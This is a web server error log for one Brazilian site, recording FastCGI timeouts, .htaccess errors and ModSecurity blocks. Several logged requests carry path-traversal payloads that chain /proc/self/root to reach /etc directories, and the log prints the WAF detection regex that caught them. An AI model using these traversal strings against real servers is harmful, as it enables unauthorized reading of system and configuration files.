[Tue Mar 17 23:15:39.121930 2026] [proxy_fcgi:error] [pid 17653:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57518] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:16:02.198159 2026] [proxy_fcgi:error] [pid 11816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:57804] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:16:03.411074 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:42272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboK4-yqAr6etmhZHNpaawAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:16:05.973065 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:38850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboK5da6ubjKNq_cu4Y6QwAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 23:16:10.529254 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:38862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboK6ew_le52K8_3pV2BsAAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 23:16:27.090575 2026] [proxy_fcgi:error] [pid 2598:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58134] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:16:40.906815 2026] [core:alert] [pid 15826:tid 140411624429312] [client 74.7.241.31:58672] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/systemd/system
[Tue Mar 17 23:16:44.098126 2026] [mime_magic:error] [pid 26799:tid 140411641214720] (70014)End of file found: [client 74.7.243.128:55396] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/include
[Tue Mar 17 23:16:49.130610 2026] [proxy_fcgi:error] [pid 2598:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:58578] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:17:11.141875 2026] [proxy_fcgi:error] [pid 2598:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58904] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:17:35.161816 2026] [proxy_fcgi:error] [pid 11816:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59186] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:17:58.153819 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59494] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:18:14.282348 2026] [mime_magic:error] [pid 26799:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:57716] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/lib/firmware
[Tue Mar 17 23:18:21.126019 2026] [proxy_fcgi:error] [pid 2598:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59918] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:18:36.140544 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:42664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboLfNY0UrI5A3LftIwzHAAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:18:43.129772 2026] [proxy_fcgi:error] [pid 19507:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60198] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:19:06.124512 2026] [proxy_fcgi:error] [pid 15826:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60538] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:19:10.113878 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.244.43:46764] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboLnsdf6f5d65gmYZR0gAAAAsk"]
[Tue Mar 17 23:19:28.129831 2026] [proxy_fcgi:error] [pid 15051:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60870] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:19:31.627700 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.241.31:46514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboLs9Y0UrI5A3LftIwzNwAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Tue Mar 17 23:19:38.966243 2026] [core:alert] [pid 17653:tid 140411590858496] [client 216.73.216.191:7490] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Tue Mar 17 23:19:50.314597 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.228.61:59692] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboLxuoXxyEfFpUF8f8SCAAAAUI"]
[Tue Mar 17 23:19:51.121933 2026] [proxy_fcgi:error] [pid 2598:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:32986] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:20:15.117815 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33344] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:20:38.149798 2026] [proxy_fcgi:error] [pid 16560:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33646] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:20:56.176752 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:46836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboMCAkwaGbbGflqUZC4eQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 23:21:02.133810 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33950] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:21:25.129809 2026] [proxy_fcgi:error] [pid 16560:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34288] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:21:26.014541 2026] [mime_magic:error] [pid 15051:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:48945] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 23:21:48.133801 2026] [proxy_fcgi:error] [pid 15051:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34652] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:22:09.125845 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34950] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:22:34.833770 2026] [proxy_fcgi:error] [pid 19507:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35292] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:22:57.127717 2026] [proxy_fcgi:error] [pid 11816:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35662] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:23:04.082847 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:59626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboMh-oXxyEfFpUF8f8SbQAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:23:20.088719 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36048] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:23:42.141780 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36420] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:24:04.825802 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36738] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:24:11.778445 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.244.43:44358] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboMy-oXxyEfFpUF8f8ShgAAAVc"]
[Tue Mar 17 23:24:26.119107 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37024] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:24:49.140429 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37418] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:24:50.799431 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.228.61:50622] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboM8ta6ubjKNq_cu4Y7IwAAA00"]
[Tue Mar 17 23:25:12.125813 2026] [proxy_fcgi:error] [pid 17653:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37856] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:25:34.085817 2026] [proxy_fcgi:error] [pid 11816:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38216] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:25:57.101802 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38606] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:26:19.133895 2026] [proxy_fcgi:error] [pid 11816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38876] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:26:43.125781 2026] [proxy_fcgi:error] [pid 11816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39288] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:27:05.141799 2026] [proxy_fcgi:error] [pid 17653:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39654] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:27:28.053816 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:40054] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:27:51.129782 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40422] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:28:14.135334 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40844] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:28:37.121810 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41184] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:29:01.093855 2026] [proxy_fcgi:error] [pid 15051:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41482] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:29:12.790317 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.244.43:54726] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboN-Na6ubjKNq_cu4Y74wAAA0g"]
[Tue Mar 17 23:29:25.125855 2026] [proxy_fcgi:error] [pid 11816:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41792] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:29:29.086353 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:51522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboOCSmAPhZkrhU8w4kWzQAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 23:29:48.141796 2026] [proxy_fcgi:error] [pid 11816:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42184] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:29:52.885897 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.228.61:36188] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboOIBj0p0SRWAqcjGGv7QAAAwg"]
[Tue Mar 17 23:30:11.122268 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:30:22.225050 2026] [mime_magic:error] [pid 15826:tid 140411691570944] (70014)End of file found: [client 74.7.241.31:58132] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/systemd/netif
[Tue Mar 17 23:30:33.102179 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42928] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:30:51.351300 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:50070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboOW9a6ubjKNq_cu4Y8HAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 23:30:56.141823 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43252] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:31:19.117859 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43544] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:31:35.371043 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:36212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboOh-yqAr6etmhZHNpbsAAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 23:31:41.125771 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43902] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:31:51.942247 2026] [core:alert] [pid 19507:tid 140411607643904] [client 74.7.243.128:36220] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/log
[Tue Mar 17 23:31:55.735561 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:47894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboOm-w_le52K8_3pV2EiQAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 23:32:03.161795 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44228] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:32:25.125814 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:44616] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:32:49.097790 2026] [proxy_fcgi:error] [pid 15051:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45074] AH01075: Error dispatching request to : (polling)
